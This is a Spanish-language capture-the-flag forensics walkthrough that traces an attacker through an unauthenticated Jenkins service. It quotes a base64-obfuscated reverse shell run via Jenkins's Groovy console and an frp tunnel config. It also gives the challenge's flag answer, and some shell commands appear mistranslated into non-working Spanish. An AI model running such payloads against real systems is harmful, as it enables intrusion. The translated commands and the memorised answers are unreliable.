Análisis Forense de Seguridad: Seguimiento de Ataque
Objetivo del Reto
- Dirección IP del servidor de salto interno del atacante
- Dirección del servidor del atacante
- Servicio vulnerable (sugerencia: 7 caracteres)
- Flag dejada por el atacante (formato: zgsf{})
- Correo electrónico del atacante
- ID del atacante
Credenciales de acceso usuario/contraseña: zgsfsys/zgsfsys
Dirección IP del servidor de salto interno del atacante
Al examinar los registros de Baota, se puede identificar el tráfico malicioso que permite determinar la dirección del servidor de salto interno.
192.168.11.
Otra vía para descubrir esta información es revisar el archivo "1" en el directorio raíz y analizar el historial de comandos:
usuario@servidor:~$ historial
1 cd Escritorio/
2 crear directorio claves.txt
3 touch claves.txt
4 reinicio
5 ~ifconfig
6 ifconfig\
7 ifconfig
8 sudo reinicio
9 ping google.com
10 wget http://mirrors.jenkins.io/debian/jenkins_1.621_all.deb
11 ping google.com
12 cd Descargas/
13 sudo dpkt -i jenkins_1.621_all.deb
14 sudo dpkg -i jenkins_1.621_all.deb
15 sudo apt install daemon default-jre-headless
16 sudo apt update
17 ++++==
18 sudo apt install daemon default-jre-headless
19 sudo apt install -f daemon default-jre-headless
20 sudo apt-get -f install
21 sudo apt install openjdk-8-jre-headless java-common
22 sudo dpkg -i jenkins_1.621_all.deb
23 ifconfig
24 curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh && sudo bash quick_start.sh
25 sudo apt install curl
26 curl -sSL https://resource.fit2cloud.com/1panel/package/quick_start.sh -o quick_start.sh && sudo bash quick_start.sh
27 wget -O install.sh https://download.bt.cn/install/install_lts.sh && sudo bash install.sh ed8484bec
28 sudo cat /var/log/jenkins/jenkins.log
29 sudo cat /var/log/jenkins/jenkins.log | grep 12
30 sudo cat /var/log/jenkins/jenkins.log
31 sudo cat /var/log/jenkins/jenkins.log
32 sudo cat /var/log/jenkins/jenkins.log | grep 123
33 ifconfig
34 sudo apt-get install build-essential
35 sudo apt update
36 sudo apt-get install build-essential
37 reinicio
38 sudo reinicio
39 ifconfig
40 sudo docker ps -a
41 sudo docker start 3acc7ad9722f
42 sudo docker ps -a
43 docker exec -it 3acc7ad9722f /bin/bash
44 sudo docker exec -it 3acc7ad9722f /bin/bash
45 sudo docker start 3acc7ad9722f
46 sudo docker exec -it 3acc7ad9722f /bin/bash
47 sudo docker exec -it 3acc7ad9722f /bin/bash\
48 ifconfig
49 reinicio
50 ping 192.168.11.129
51 vim /etc/default/jenkins
52 sudo vim /etc/default/jenkins
53 sudo systemctl restart jenkins
54 println "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE= | base64 --decode | bash ".execute().text
55 echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE= | base64 --decode | bash
56 ls
Al descodificar la cadena base64, se confirma la dirección del servidor de salto.
Dirección del servidor del atcaante
Al cambiar al usuario root, se encuentra un directorio "tunel" en el directorio raíz:
usuario@ubuntu:~$ sudo su
[sudo] contraseña para usuario:
root@ubuntu:/home/usuario# cd /root
root@ubuntu:~# ls
tunel
root@ubuntu:~# cd tunel
root@ubuntu:~/tunel# ls
frpc frpc.toml sistema
Aquí se encuentra la herramienta de penetración de red interna frp. Al revisar el archivo de configuración:
root@ubuntu:~/tunel# cat frpc.toml
direccionServidor = "127.0.0.1"
puertoServidor = 7000
[[proxies]]
nombre = "Servidor-Ataque"
tipo = "tcp"
ipLocal = "156.66.33.66"
puertoLocal = 22
puertoRemoto = 6000
Se identifica la dirección del servidor del atacante: 156.66.33.66
Servicio vulnerable (sugerencia: 7 caracteres)
En el historial de comandos se observa múltiples revisiones de los registros de Jenkins. Al utilizar netstat -ano, se confirma que el puerto 8080 está abierto. Al acceder a este puerto, se trata de un servicio Jenkins accesible sin autenticación, lo que rerpesenta una vulnerabilidad de seguridad.
Flag dejada por el atacante (formato: zgsf{})
Al explorar el servicio Jenkins accesible, se encuentra el flag: zgsf{gongzhonghaozhigongshanfangshiyanshi}